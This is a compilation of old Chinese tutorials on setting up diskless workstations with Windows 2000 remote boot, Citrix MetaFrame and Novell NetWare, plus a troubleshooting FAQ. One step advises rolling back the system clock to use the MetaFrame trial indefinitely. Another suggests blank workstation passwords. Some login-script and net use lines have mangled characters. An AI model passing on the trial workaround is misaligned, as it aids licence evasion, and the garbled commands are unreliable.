    2. 安装远程启动服务

    由于WIN2K不支持远程启动，所以需要下载一个相关补丁程序“rplw2k.exe”。运行补丁程序后，对于所有提示均选默认选项即可。安装完毕重启后，进入“开始→程序→管理工具→服务”，即可看到“远程启动服务”已安装成功，并已自动处于“已启动”状态（图1）！
远程启动服务文件位于“\WINNT\Rpl”目录下，把其中的“rplemd.exe”和“rplmgr.exe”两个文件在桌面建好相应快捷图标，便于以后操作。

    3. 复制DOS系统文件

    将相关文件（如“msdos.sys”、“io.sys”、“command.com”和“himem.sys”等）复制到“\WINNT\Rpl\RPLFILES\
BINFILES\DOS622”目录中即可。

    4. 创建DOS无盘站的网卡配置文件
打开任意一台无盘工作站，抄下其网卡的12位物理地址。而且注意请确保服务器端已处于大写英文字母状态（按键盘“Caps Lock”键）。

    双击桌面的“rplcmd”相关图标以运行为网卡制作无盘启动配置文件的程序，并严格按如下内容进行输入操作：

    适配器引导 Config 配置文件服务代理商 Wksta[退出]:V

添加 Del Enum:A
VendorName=52544C
所有其它参数都是可选的
VendorComment=NE2000 COMPATIBLE
适配器引导 Config 配置文件服务代理商 Wksta[退出]:B
添加 Del Enum:A
BootName=DOSTO2K
VendorName=52544C
BbcFile=BBLOCK\NETBEUI\NE2000\DOSBB.CNF
所有其它参数都是可选的
BootComment=NE2000
WindowSize=0
适配器引导 Config 配置文件服务代理商 Wksta[退出]:C
添加 Del Enum:A
ConfigName=DOS6.22
BootName=DOSTO2K
DirName=DOS
DirName2=DOS622
FitShared=FITS\DOS622.FIT
FitPersonal=FITS\DOS622P.FIT
所有其它参数都是可选的
ConfigComment=DOS TO 2K
DirName3=
DirName4=
适配器引导 Config 配置文件服务代理商 Wksta[退出]:Q

    注意：

    (1)黑体字部分是自己手工输入，其他部分均为系统自动显示。输入时请千万小心，不能出错！

配置无盘ＤＯＳ工作站

    先要打开所有的无盘工作站，以使服务器能读出各机的网卡ID（物理地址）。

    然后双击桌面的“rplmgr”相关图标，运行“远程启动管理器”程序。此时系统会提示“创建了配置文件后才能创建或编辑工作站”，按“确定”即可，则系统会自动读出所有已打开的无盘工作站的网卡地址。依次选择“配置”菜单里的“检查配置”和“修复安全性”两项，遇有提示，一律选“是”即可。

    建立无盘DOS工作站的配置文件：

    1. 选“远程启动”菜单里的“新的配置文件”，在“配置文件名”处输入任意配置文件的名字，在“配置”处选择在前面操作步骤中“ConfigComment=DOS TO 2K”行中所输入的“DOS TO 2K”部分。

    2. 再依次选择“配置”菜单里的“检查配置”和“修复安全性”两项，遇到提示，一律选“是”即可。

    3. 则在下半部分的“配置文件名”窗口中即可看到自己所建立的无盘DOS工作站的配置文件。

    4. 无盘站的根目录将为“\WINNT\Rpl\RPLFILES\PROFILES\DOS6.22”。其中，“DOS6.22”即为“配置文件名”项所输入的内容。

    我们在工作站列表中单击以选中任意一台工作站，再选“远程启动”菜单中的“转换适配器”项。其中“Wksta 名”项输入的内容将为此无盘站的登录用户名；“描述”项默认值为前面操作步骤中“VendorComment=NE2000 COMPATIBLE”行中所输入的“NE2000 COMPATIBLE”部分，可不用修改；“密码”项可输入相应密码（建议为空）；在“配置文件中的Wksta”处确保已选中相应的配置文件名。其他项可以不用修改，最后单击“添加”按钮即可。

    用上述同样方法逐台添加好所有的DOS无盘工作站即可。

安装无盘终端

    1. 安装终端服务

    进入“控制面板→添加/删除程序→添加/删除Windows 组件”，在“Windows 组件安装向导”勾选中“终端服务”项，再按“下一步”即可。然后依次选“应用程序服务器模式→下一步→跟 Terminal Server 4.0 用户兼容的模式”及其他默认选项。

    2. 安装MetaFrame服务器端

    需要下载MetaFrame服务器端安装文件“win2Kserver.zip”，该文件包括MetaFrame的服务器端安装文件和升级文件（SP2）二项。

    将下载得到的“win2Kserver.zip”文件解压到任意磁盘的任意目录中（比如“F:\nodisk”），其下会自动建立一个名为“win2Kserver”的目录，包括“I386”和“SP2”两个子目录。

    然后进入“F:\nodisk\win2Kserver\I386”目录，运行安装文件“autorun.exe”，之后选“MetaFrame Setup”项，即可开始安装MetaFrame服务器端。对于所有提示，均选默认选项即可，安装完重启成功后，“MetaFrame”服务将自动运行。

    接下来，再进入“F:\nodisk\win2Kserver\SP2”目录，运行安装文件“autorun.exe”之后选“MF1.8 SP2 for Windows2000”项，即可开始安装MetaFrame服务器端升级文件。同样对于所有提示，均选默认选项即可。

    3. 安装基于DOS的MetaFrame客户端

    需要下载MetaFrame基于DOS的客户端安装文件。先将下载的“dosclient.zip”文件解压到任意磁盘的任意目录中（比如“F:\nodisk”），在其下建立一个名为“dosclient”的目录。
进入“F:\nodisk\dosclient”目录，在其下的子目录“disk1”上单击鼠标右键，选“共享→共享该文件夹”，将“共享名”一项改为“dosto2k”，然后按“确定”退出。

    启动任意一台工作站，用管理员身份（Administrator）进行登录，等进入DOS后，在系统提示符下输入命令行“net use k: \\wy\dosto2k”后再回车，即将服务器的共享目录“dosto2k”映射成了工作站的K盘。然后转到K盘，运行安装文件“install.exe”后即可进入客户端安装界面。此时需要先根据提示，按“F1”键接受协议，然后按回车键接受系统默认的“C:\wfclient”的安装路径即可。

配置无盘终端

    1. 转到“C:\wfclient”目录，先运行鼠标驱动程序“mouse.com”，再运行文件“wfclient.exe”后即可进入客户端配置界面。此时系统会询问是否建立新的到服务器的连接，选“Yes”即可。

    2. 在名为“Entry Properties”的配置界面中，先需要在“Description”（描述）项输入连接名，可以是任意内容（比如为“nodisk”）；然后在“Transport”（传输）项中选择相应协议，请使用“NETBIOS”；则此时，系统会自动选择“Server”项，并在其下显示终端服务器名（比如为“WY”）；如需自动登录，则还要在“Username”（用户名）、“Password”（密码）和“Domain”（域）等项中输入相应内容；如果已安装声卡，则再复选中“Enable Sound”（允许声音）项，最后按“OK”保存退出。

    3. 在名为“Citrix ICA Client for DOS”的主窗口中即可看到已建立好的新连接。

    4. 选中此连接后，再选菜单“Options→Preferences”进入名为“Preferences”的属性窗口，以改变客户端终端窗口所显示的色彩和分辨率，一般选

注意事项

    1. “图形界面登录”：重新启动工作站，以普通用户身份登录，运行鼠标驱动程序“mouse.com”后，先进入“C:\wfclient”目录，再运行“wfclient.exe”文件，即可进入客户端连接窗口，然后双击所建立好的连接即可进入WIN2K终端屏幕；

    “命令行登录”：在“C:\wfclient”目录中，输入如“wfclient nodisk /batch”的命令行再回车，即可直接进入WIN2K终端屏幕（注：“nodisk”为连接名，如果此连接名间有空格，则必须用半角的双引号将所有连接名扩起来，如“wfclient "my nodisk" /batch”的格式）。
以上两种方法均可进入同样的WIN2K终端屏幕。不过用命令行方式登录，一则为全自动登录提供了可能；二则可占用比图形界面登录方式更少的本机内存，因此强烈推荐使用！

    2. 选“开始→注销xx”（xx为当前已登录的用户名）即可正常退出终端屏幕。

返回


无盘终结者—进阶

《一键清理系统垃圾》

无盘终结者—进阶

网络特性：
■ 速度更快
■ 可上声音
■ 支持16、32位真彩
■ 工作站使用≥16M内存

    在进阶篇里，我们来介绍如何组建基于无盘WIN3.2环境下的无盘Win2000终端。

安装第一台工作站

    所需软件：WIN3.2、工作站显卡和声卡的驱动程序（先在服务器端将需要的安装文件共享。右键单击文件，选“共享→共享该文件夹”，“共享名”可保持原来文件名不变。）

    安装步骤：

    （一）安装WIN3.2系统（工作站端）

    1.在任意一台工作站端计算机以管理员身份（Administrator）登录，完成DOS的无盘启动。

    2. 将服务器中的共享名“PWIN32”映射成无盘DOS系统的F盘，即在系统提示符后输入“net　use　f：\\wy\pwin32 ”。

    3. 进入F盘，执行“setup/a”，开始WIN3.2的管理方式安装。安装过程中系统会自动将WIN3.2的安装文件复制到无盘工作站的“c:\win”目录中，并将这些文件的属性标记为“只读”。

    4. 进入“c:\win”目录，执行“setup/n”，为当前工作站安装其专用的WIN3.2系统文件。安装完成后重新启动此工作站，用其默认的用户名进入，在“c:\”下直接输入“WIN”，回车即可进入其专用的WIN3.2系统。

    （二）安装驱动程序（工作站端）

    1. 将服务器上相应的共享文件目录（即显卡和声卡的驱动程序）映射成工作站的驱动器。

    2. 进入WIN3.2，选程序管理器中的“文件→运行→浏览”，然后选择相应的驱动程序安装文件。

    3. 补充说明：对于某些类型的声卡，需要先在DOS下安装其在DOS下的驱动程序，然后再在WIN3.2中安装WIN3.2的驱动程序之后才能够正常使用；而显卡则只需直接在WIN3.2下进行安装即可。

安装Windows 2000 无盘终端站

    所需软件：“Windows 2000 Advanced Server”安装光盘和“Citrix MetaFrame Ver1.80”（英文版）安装文件及其SP2升级文件精简版。

    安装步骤：

    （一）安装终端服务

    1. 安装需要“Windows 2000 Advanced Server”安装光盘，先将之放入光驱内。

    2. 在服务器端进入“Windows组件安装向导”。

    3. 在“Windows组件安装向导”勾选“终端服务”，进入下一步。

    4.再依次选择“应用程序服务器模式→下一步→跟Terminal Server 4.0 用户兼容模式”及其他默认选项，最后按“完成”，结束安装。

    5. 安装完成后需要重新启动计算机。

    （二）安装MetaFrame服务器（在服务器端）

    1. 到“http：//www.enanshan.com/down/mf18.zip”下载MetaFrame及其相关组件（至少要包括MetaFrame的服务器安装文件、MetaFrame的服务器端升级文件和MetaFrame的16位客户端安装文件）。

    2. 将下载得到的“mf18.zip”解压到任意磁盘的任意目录中，系统会自动建立一个名为“MF18”的文件夹（包含三个文件夹：“I386”、“SP2”和“ICA16”）。

    3. 进入“I386”文件夹，运行安装文件“autorun.exe”，选择“MetaFrame Setup”，开始安装MetaFrame服务器端。

    4. 安装过程中选择其默认选项，安装完成后系统将自动重新启动计算机。

    5. 重新启动成功后，“MetaFrame”服务将自动运行，同时出现此软件还有多少天有效期的提示，不用管它，直接按“确定”即可。（只要把系统时间改在有效期内，则此软件便可永久性使用！）

    6. 升级MetaFrame服务端。安装好MetaFrame后，进入“SP2”文件夹运行“autorun.exe”，选择“MF1.8　SP2　for　Windows　2000”进行MetaFrame升级，升级后即可支持16或24位真彩。

    （三）安装MetaFrame客户端（在工作站端）

    （先在服务器端将“MF1.8”文件夹下的子文件夹“ICA16”共享）

    1. 启动工作站后，将服务器的共享文件“ICA16”映射成工作站的K盘（具体操作见上）。

    2. 进入K盘，选择“K：\disk1”目录下的“setup.exe”文件开始进行安装。

    3. 安装过程遇到提示，均选择默认选项。安装完成后系统会自动建立一个“Citrix ICA Client”的程序组。

配置工作站：

    （一）配置MetaFrame客户端（工作站端）

    1. 建立新的连接。打开“Citrix ICA Client”程序组中的“Remote Application Manager”（远程应用管理器），建立一个新的远程连接。

    2. 选择连接方式。选“Network”（网络），再进入下一步。

    3. 连接明细的对话窗口。在“Description”（描述）中输入任意仅用于显示的连接名；“Network Protocol”（网络协议）中选择“VETBIOS”；在下面选“Server”（服务器），并输入服务器的计算机名，填好后单击“下一步”。

    4. 选择网络连接类型。一般选择“I have a fast network connection（LAN）”。

    5. 输入登录信息。除了输入用户名和密码，还要在“Domain”中输入服务器的名称。

    6. 声音与显示设置。声音的设置“Enable Sound”（允许声音）需要WIN3.2中装有声卡驱动程序。显示的设置有两项——分辨率和色彩，需要改变点击“Change”按钮，分辨率选择最好是“Full Screen”，否则不管选择其他什么分辨率，终端窗口上都会有一条WIN3.2的标题栏。

    7. 完成操作。剩下的项目依照默认选项即可完成操作。

    8. 修改连接。需要修改已经建立好的连接，选中该连接，再在工具栏上操作。工具栏上图标的作用依次是：左起第一个为新建一个连接；第二个为复制当前连接；第三个为删除当前连接；第四个为修改当前连接属性；第五个为激活当前连接（相当于双击此连接）；第六个为配置调制解调器；第七个为断开当前连接。

    （二）设置登录权限（服务器端）

    1. 按照默认，系统自动在“开始→程序→管理工具→ActiveDirectory用户和计算机”中建立一个名为“RPLUSER”的本地域的安全组，所有在“远程服务器”中新增加的远程启动用户都会被自动归入此组中。

    2. “RPLUSER”不具有通过终端在本机登录的权限，需要在“开始→程序→管理工具→域控制器安全策略”中设置。依次选择“左边面板→安全设置→本地策略→用户权利指派→右边面板→在本地登录”。

    3. 双击“在本地登录”进入“安全策略设置”窗口，按“添加”就给予了“RPLUSER”在服务器上登录的权限了。

    (三)使用MetaFrame客户端

    1. 连接终端。启动无盘工作站，用普通用户进行登录。进入WIN3.2后打开远程应用管理器中已经建立好的连接图标，输入相应的用户名和密码，即可成功得到在无盘WIN3.2下的WIN2000终端屏幕。

    2. 退出终端。选“开始→注销”即可正常退出终端屏幕；如果采取直接关机的方法退出，只要服务器一直开着，则任何时候再用相同的用户名登录，均可接着上次的操作状态继续工作，而不会有任何数据或步骤的丢失；类似于“休眠”功能。

配置其他无盘工作站：

    准备工作

    1. 确保已配置好了第一台无盘WIN3.2工作站，并作好全部设置工作。

    2. 确保要配置的工作站已在服务器端的“远程启动管理器”中进行了添加。

    操作步骤（服务器端）

    1. 以已经配置好的第一台工作机为“模板机”，将其配置文件复制到其他工作机的相应文件夹即可。各个工作站的配置文件所在目录均为“WINNT\Rpl\RPLFILES\MACHINES”。

    2. 如果工作站的显卡和声卡与“模板机”不同，则需要重新安装相应设备的驱动程序。

返回


无盘终结者—软件

《一键清理系统垃圾》

无盘终结者—软件

    昂贵的计算机网络设备往往让一些囊中羞涩的公司望而却步，但计算机网络所带来的巨大便利却又让人们不忍放弃，如何利用最小的投入换取最大的效益成为很多人在组建计算机网络时所追求的目标。无盘网络技术的产生，正迎合了这种愿望，既大幅度地降低了网络架设成本，又满足了用户的需求和管理方便的需要。

多媒体安装

    前面我们提到了无盘网络的架设，这是无盘网络正常运行的基础，为了满足我们进一步学习和试验的需要，无盘网络，特别是无盘工作站还需要安装一些必须的硬件和软件。这样才能使我们的无盘网络如虎添翼。

    一、显卡安装

    在完成无盘网络的基本架设后，可以根据终端客户机的具体配置，安装需要的硬件。首先介绍一下在终端客户机操作系统为Win3.2的情况下，如何安装显卡。我们以Zeline--V2M2显卡为例，按照以下基本步骤进行安装。

    1. 服务器端将欲安装的显卡驱动程序所在目录共享出来，以便所有的客户机能够直接访问，比如其共享名为“V2M2”。

    2. 终端客户机上用超级管理员（Administrator）的身份进行登录，进入DOS后，在运行中敲入用“net-use--g:--\\wy\v2m2”命令，则可将“V2M2”映射为客户端的G盘（g:）。接下来的安装就可以直接访问G盘来获取驱动程序了。

    3. 完成文件映射后，进入Win3.2界面，选择“程序管理器” 菜单中的 “文件→运行”，选择G盘上的“setup.exe”文件，也就是显卡厂商为我们提供的显卡安装程序，然后按提示进行操作即可。安装过程如果提示缺少文件，可以不用管他，这一般是由于读取映射文件时遇到网络繁忙等原因产生的，可以按“确定”强行继续，一般反复几次就会安装成功。

    4. 安装完成之后，退出Win3.2，回到DOS状态下，此时在C盘下你会发现新出现一个名为“C:\Mxic\Win31”的目录，用“copy”命令将此目录中所有文件复制到“C:\Windows”目录中，这样显卡就被正确地安装到网络中，最后再重新进入Win3.2即可。

    二、声卡安装

    作为多媒体表现手段的另一要素，声音在无盘工作站中也是不可缺少的，下面将介绍在Win3.2无盘工作站中如何安装声卡。可以说安装声卡的步骤与安装显卡有着很多相似的地方。我们以“Yamaha719”为例在终端客户机中安装声卡。

    1. 我们需要在服务器端将此声卡在Win3.2中所使用的驱动程序所在目录共享出来，比如其共享名为“Win31”。

    2. 在终端客户机上用超级管理员的身份进行登录成功DOS后，用“net-use--j:--\\wy\win31”命令将“Win31”映射为本客户端的J盘（j:）。

    3. 仍然在DOS下，在C盘根目录下建立一个任意名的目录，比如“C:\Sound”，将J盘中所有文件均复制到此目录中；然后编辑此目录中的“install.bat”文件，将其中所有的“A:”均改成“C:\Sound”；最后执行“install.bat”按提示进行操作，等文件复制完成后退出安装程序。此时在C盘下已有了一个名为“C:\OPL3Temp”的目录，存放着声卡驱动程序所需的相关文件，此时需要将其下的所有文件均复制到“C:\Windows”目录中。

    4. 最后进入Win3.2，系统会自动完成在Win3.2下驱动程序的最后安装工作。之后即完成了对此声卡的安装工作。

    5. 进入“程序管理器”中的程序组“文件管理器”，然后再依次进入“控制面板→声音”，如果声卡已安装成功，则此时其中的“事件”和“声音”中的内容都是可选的；否则为灰色，不可用。

    6. 如果在Win3.2中已成功安装好了客户端所配声卡的驱动程序，则此客户端登录到2K无盘终端中后，也将自动有声音。

应用软件安装

    系统有了硬件的支持，还需要相关的软件环境，下面我们介绍如何在无盘客户机中安装应用软件。以Ｗｉｎ２Ｋ系统作为网络操作系统，那么安装应用软件相对要容易一些，用户只需将服务器的光驱或者应用程序所在的硬盘目录共享出来，在工作站的网上邻居即可找到（如果网上邻居不可用，可修改启动文件Ｗｉｎ．ｂａｔ，将光驱映射为一个盘即可），再将光驱或特定的目录映射为一个磁盘，然后工作站就可以通过网络读取光驱或特定目录下的安装文件了。这与读本地的光驱或硬盘是没有差别的。

    下面我们从两个实例入手，详细地看一下无盘工作站上应用程序的安装过程。首先需要指出的一点是，我们在服务器端安装应用程序时，可能会遇到下面的问题。如果我们在服务器上安装了终端服务后，则绝大部分的安装文件（如“ｓｅｔｕｐ．ｅｘｅ”）直接运行时均会出现错误提示，而无法继续执行下去。

    正确的安装方法是，先进入“我的电脑→控制面板→添加/删除程序”，再选“添加新程序→光盘或软盘”，然后按照提示进行操作。

    绝大部分的应用程序，比如WPS2000、PhotoShop5.0、OICQ等均可在终端服务器上一次性安装成功并在无盘终端机上直接使用；而比如Office 2000等则必须用特殊的方法进行安装。

    一、办公软件安装

    那么如何在服务器上安装类似Office2000的软件，才能保证它在无盘工作站上正常运行呢？我们可以使用定制文件的方式来实现Office2000的安装，这里我们使用Tvermsrvr作为定制安装的辅助软件，它的下载地址是http://www.enanshan.com/down/TERMSRVR.
MST，我们假设Office 2000的安装程序“setup.exe”在“G:\”中，而Office 2000的定制安装文件“TERMSRVR.MST”在“F:\”中，则在“添加新程序”的“打开”一栏中应输入“G:\setup--TRANSFORMS="F:\TERMSRVR.MST”。

    随后，按提示进行操作即可。需注意的是，为了确保Office 2000在无盘终端机上的运行速度，请尽量不要安装不必要的组件。

    二、输入法安装

    为计算机安装新的输入法也是我们经常进行的操作之一。安装输入法的步骤比较简单，首先在服务器端用管理员的身份登录后进行正常安装。再用普通终端用户在终端客户机上登录，进入“我的电脑→控制面板→键盘”，再选“输入法区域设置→添加”，在“键盘布局/输入法”中选择已安装的五笔字型输入法再“确定”即可

接入互联网

    利用无盘工作站上网，要解决以下几个问题。

    1. 为无盘工作站安装一个浏览器，基本的方法与安装其他应用软件相类似，也要在服务器上共享出安装目录，为无盘工作站做映射盘，然后通过网络直接安装。

    2. 在服务器上上安装代理服务器软件，这样就可以实现无盘网络共享上网，以及网内的文件传输和远程登录服务。如果使用Win2000作为操作系统，那么可以直接利用它的代理功能。另外我们也可以使用Wingate、Sygate、Proxyi等传统的代理服务器软件。

    3. 然后就需要我们对服务器进行设置。如果系统中安装了IIS，那么需要特别注意代理服务软件的服务端口是否与IIS的各项服务端口相冲突。相应地我们还要根据服务器的上网方式对网络服务进行设置，如果是拨号上网，则要一一把拨号需要的各种协议和基本的参数搞定。

    4. 对代理服务器软件进行设置，诸如E-mail、 FTP、Telnet、 RealAudio/Video等服务参数，优先权控制(优先权大的工作站可优先获得信息)，受限站点控制(可控制某些工作站不能浏览某些站点)，防火墙，自动拨号等进行设置。

    5. 对无盘工作站进行设置，打开浏览器的“首选项→高级→代理→选手工配置→察看”，设置代理服务器的IP和Port值。至此，服务器和工作站就全部设定好了，重新启动后可先用ping命令进行测试。接下来大家就可以利用无盘工作站享受网上冲浪的乐趣了。

返回


五问NT无盘网

《一键清理系统垃圾》

五问NT无盘网

    NT网以其易管理的特点，成为许多远程启动无盘网首选的网络操作系统，但其开放性较强的特点，又给维护工作带来很多的烦恼。以下是几个NT无盘网中常见的问题及解决方法，供大家参考。
    一问：为什么所有工作站进不了WIN95？工作站显示信息为：“Server based setup boot utility v1.0(c) copyright microsoft corp 1995.
    Initializing Workstation 〈网卡号〉
    ERROR:0001 No registry path is defined.
    A Error occurred booting this server based workstation.you will need to contact the system administrator for help.”
    答：在服务器上检查，发现工作站WIN95公用目录W95S中的文件除了子目录外全被删除了，自然各工作站无法进入。因事先没有做系统备份，用了一天时间又重装了一遍WIN95。
    二问：为什么所有工作站又进不了WIN95？显示信息仍与问题一相同。
    答：检查W95S，文件完好无缺。问题起因是此目录中用户文件太多，删除W95S目录后，将备份W95S考回所致。解决办法：在服务器上将W95S目录共享即可。
    三问：为什么部分工作站无法进入WIN95？显示信息为：“C:\WINBOOT>”
    答：这些进不了WIN95的工作站是由于有意或无意删除了服务器上其自身目录下的一些文件，其中包括WIN.COM文件，所以无法进入。假定工作站是“1”号机，则是由于服务器上“MACHS\1”目录中的WIN.COM等文件被删除导致不能进入WIN95。有两个办法可以解决问题：1.可以从其它工作站的相应目录中复制文件，覆盖到故障机的目录中。比如将“2”号机目录“MACHS\2”的内容复制后覆盖“1”号机目录“MACH\1”。这种方法应在“2”号机没有启动的条件下使用，不然会引起诸多的麻烦。2.事先将“MACHS”目录做一个总备份，出问题后，将备份的“1”号机目录考回“1”号机目录即可。建议最好采用第二种方法。
    四问：为什么无法使用服务器D盘上的应用程序？故障现象：从工作站进入WIN95后，映射服务器D盘驱动器有一红色叉子，表示无法链接。
    答：因为给工作站WIN95设置了口令，其它人上机只好选择“取消”进入，所以在工作站上无法连接D盘。解决办法：进入工作站WIN95，运行“REGEDIT”，将[HKEY_LOCAL_ MACHINE\NETWORK\LOGON]下的“PrimaryProvider”键值由“Microsoft Network”改为“自由登陆”即可。从这个问题中我们还认识到：NT无盘工作站是将服务器上的共有目录当作工作站自身一部分，而要访问服务器上的其他资源，还需以入网的方式获取。
    五问：为什么在DOS系统下，无法进入映射的服务器D盘？故障现象：无法映射应用程序所在的盘符。
    答：由于工作站在WIN95方式或在DOS方式下删除了服务器中工作站启动目录RPL里rplfiles\binfiles目录的有关文件，所以发生如上问题。因事前只备份了rplfiles\profiles子目录，没有备份bintiles目录只好又重装系统。
    从问题1、2、5可以发现，只要我们的事前工作做得妥善，将W95S、MACHS和RPL目录做好备份，这些问题即可避免；而注意删除W95S中文件时不要将其目录一起删掉，即可避免问题三的发生；只有问题四比较麻烦一点。就整体而言，NT无盘网管理起来还是蛮简单的。

返回


系统软件在无盘工作站上的应用

《一键清理系统垃圾》

系统软件在无盘工作站上的应用

     大家知道，许多单位都已从单机管理走上了网络化，从网络系统的安全性出发，除了必要的管理工作机以外，绝大多数采用无盘工作站。而一般来说，各无盘工作站均有自己特有的工作，当然也有自己对应的网络管理应用程序，对于这种单一工作、单一应用程序的无盘工作站，其LoginScript设计十分方便，可在LoginScript的最后一句加上exit＂zpqd＂（zpqd为运行应用程序之批处理），在批处理zpqd．bat最后加上logout，使其退出应用程序即下网，不过别忘了对其所在组的目录权限设计应适当，这样的话，操作员除了使用应用程序之外，别无选择。
    但是，诸如财务、劳资人事等管理来说，从经济、管理及安全性考虑，配置无盘工作站是为上策，可为了兼容本身单位的费用管理程序，仅仅使用单一的应用管理软件显然是不够的，最起码的要求也应安装数据库管理系统软件如Foxbase或FOXPRO、文书编辑软件如WPS或CCED，其中CCED5．03由于与Foxbase的合作性及自身的制表功能强大而被广泛使用。下面笔者就无盘工作站上使用系统软件时的有关配置及CCED5．03的网络上的应用谈谈自己的看法。
    一、假设我们要在财务管理及劳资人事管理工作站上安装Foxbase及CCED5．03，最基本的想法是分别设立其工作组，使用SYSCON对各自的权限进行限制。但我们知道，对于系统软件来说，由于要使用临时文件，其权限至少应为［RWCMF］，这样的话对于普通操作员来说，无疑于把整个系统暴露在其面前，如不注意就可能把系统文件删除，造成系统的破坏，给别的使用者也带来麻烦。所以我们也应该设计与单一应用程序工作站相似的LoginScript及上下网。对于诸如本例中使用两种以上的系统软件来说，最好的解决方法便是使用DOS的choice命令。方法如下：1．在用户卷建立相对应的用户目录（本例为CWGL和NZGL）；2．用SYSCON建立用户组CWGL组（财务）和NZGL（劳资人事）组，并进入TrusteeDirectoryAssignments（受托者目录指派）中设置其目录权限，如下（以CWGL为例）；
    SYS：LOGIN
    ［RF］
    SYS：PUBLIC
    ［RF］
    USER：CCED［RWCMF］
    USER：FOX［RWCMF］
    USER：UCDOS［RWMF］
    USER：CWGL［SRWCEMFA］
    3．在各组中分别设立用户，如要CWGL组中设立CW01及CW02等，在NZGL中设立NZ01和NZ02等；
    4．建立各自的LoginScript，如下（以CW01为例）：

    MAPINSS1：ΚSYS：PUBLICιDOS6．22
    COMPESCΚS1：COMMAND．COM
    MAPF：ΚUSER：
    MAPINSS2：ΚUSER：UCDOS
    MAPINSS3：ΚUSER：CWGL
    MAPINSS4：ΚUSER：FOX
    MAPINSS5：ΚUSER：CCED
    MAPINSS6：ΚSYS：LOGIN
    DRIVEU：
    EXIT“CWQD“
    其中EXIT“CWQD“为系统软件在无盘工作站上应用的关键，其内容如下（CWQD．BAT之内容）：
    ΝECHOOFF
    F：
    CALLιUCDOSιUP
    CDCWGL
    ：BEGIN
    CW（封面程序CW．EXE）
    CHOICE／C：123／T：3，60请选择：1－FOX数据库系
统；2－CCED；3－退出网络
    IFERRORLEVEL3GOTOEND
    IFERRORLEVEL2GOTOCCED
    IFERRORLEVEL1GOTOFOX
    ：FOX
    CALLF：ιFOXιFOX
    GOTOBEGIN
    ：CCED
    F：ιCCEDιCCED
    GOTOBEGIN
    ：END
    CDι
    U：
    LOGOUT
    从上可知，操作员一入网，首先提示你选择要进入的系统软件，并且所有的个人文件均保存在各组对应的目录CWGL中，当你退出其系统软件时，又回到了选择项，防止了系统直接暴露在操作员的面前，同时你还可以CHOICE语句前，加入自己制做的启动封面和音乐等（如本例的CW即为启动封面和音乐程序），做到美观与安全并存。此法虽然无法阻止特别熟悉CCED或FOXBASE的操作者进入DOSS状态修改某些文件，但其安全性已大大地提高了。这里应注意的是在你的SYS：PUBLICιDOS6．22下一定要有CHOICE．COM文件，否则会出现找不到文件的错误。
    二、大家知道，CCED编辑软件由于强大的表格功能、与数据库系统的合作性以及操作方便而一直受到用户的好评，而CCED5．03的出现，给网络上使用也带来了希望。首先在F：盘安装好CCED5．03，并在CCED中按Shift＋F4挂接好F：盘UCDOS5．0汉字系统，按“一”中所述给用户分配好目录权限，在使用时完全正常，可当你编辑好文件，进行模拟显示或打印时，系统无任何反应。刚开始笔者以为是目录权限不够，对其用户所使用的目录及文件设置为全部权限，结果仍然如此。在无盘工作站上以SUPERVISOR身份入网，运行CCED，无效果，退出CCED，在UCDOS下运行UC—CCED（CCED与UCDOS挂接程序），提示找不到CCED50．DAT，检查CCED目录，CCED50．DAT却存在，很显然UC—CCED不认F：盘的CCED。检查用户卷文件变化情况，发现在F：ι下多了文件CCED—TMG．TMP（0字节），再运行CCED，一切正常。退出CCED，删除CCED—TMG．TMP，再运行CCED模拟显示及打印又无任何反应，问题就出在这里，在网络下运行CCED的模拟显示及打印，首先应有O字节文件CCED—TMG．TMP作为路径文件，这个文件由SUPERVISOR第一次运行退出后自动建立，而且此文件一定建立在当前盘的根目录下。CW01等由于无使用USER：ι的权限，无法建立CCED—TMG．TMP，问题解决 非常简单，进入SYSCON的TrusteeDirectoryAssignments中，加上USER：［RF］（注意仅能给CW01等非SUPERVISOR用户最低的目录权限），以SUPERVISOR身份运行一次CCED，让其在F：ι下自动建立EECD—TMG．TMP，再以CW01或NZ01等进入CCED，模拟显示及打印均一切正常。

返回


在novell无盘windows95实战

《一键清理系统垃圾》

在novell无盘windows95实战

    Novell 局域网在前几年很流行，它要求 硬件设备档次较低，资金一次性投入较少，拥有大量用户。中文Windows95 图形化界面操作系统的出现，功能强，使用方便，深受广大用户青睐。如果能让Novell网络的无盘工作站共享Windows95，使原有Novell局域网焕发新的生机，岂不两全齐美，极具现实意义？！
    这项工作虽有一定的难度，但完全可以实现。报上曾有文章登过，但都偏于简单，令用户费解，不便具体操作。前些时间我给一个学校Novell教学网安装成功无盘Windows95，有些体会，现系统介绍如下。
    一、网络环境
    这个学校教学网的硬件设备是比较低档的：
    文件服务器，1台，CPU为6x86MX－PR233，硬盘2.1G，软驱为1.44M，内存32M；网卡是TW，16位。
    工作站，25台，配置都相同，CPU为6x86MX－PR200，软驱为1.44M，无硬盘，内存16M；网卡，都是TW，16位。 　　软件：网络操作系统是Novell Netware 3.12。各工作站以软盘启动入网。
    为安装无盘Windows95，需要添加下列软硬件：
    能联入Novell网的Windows95工作站 1 台，就利用原有的教师用机，其配置CPU为Pentium－MMX/200，硬盘3.2G，软驱1.44M，NEC光驱，内存32M。
    服务器原硬盘小，更换为4.3G，大点更好。
    为提高网络速度和性能，服务器的一块网卡换为TP－LINK（或D－LINK），32位。
    远程引导芯片Boot Rom，25片，再备用1片。
    中文Windows95网络版光碟（完全版）1张，一定要内含有netsetup.exe 程序文件。
    二、安装前的准备工作
    1.重新安装Novell Netware 3.12系统
    用MSDOS 6.22系统的FDISK程序，将服务器4.3G重新分区，先分一个DOS分区，如100MB，并激活，再对C盘进行带系统格式化。
    在C:\建立子目录server.312，安装Novell Netware 3.12 系统。文件服务器名取为FS；将硬盘DOS分区以外的空间全划分为Netware分区。再将该分区分为两个卷：一个系统卷，名为sys，容量为1G；一个数据卷，名为win，即其余部分约3G。
    安装好后，重新启动服务器；用原工作站的启动软盘插入带软驱的工作站，启动确认能成功登录入网或退网。
    2.使win卷支持长文件名
    在服务器引导文件autoexec.ncf中加入一行：
    load OS2.nam
    重新启动服务器，在FS:下键入：
    add name space OS2 to win
    此条命令只须执行一次，以后服务器win卷就支持长文件名了。
    3.通过一台带有软驱的工作站W11（称为主工作站），以超级用户 (supervisor) 注册入网，在F:\system下运行SYSCON程序，将
    map G:=win:
    map H:=win:windows
    map s2:=fs/sys:dos
    comspec=s2:command.com
    添加到系统注册正本netSlog.dat中去。然后重新启动机子，仍以超级用户登录入网。
    在F:\system下键入G:，回车，即进入win:卷，在G:\下用MD命令建立以下子目录：
    \windows，\home\w01～w25(25个用户的工作目录）
    \home\temp，\data\w01～w25(25个用户的数据目录）
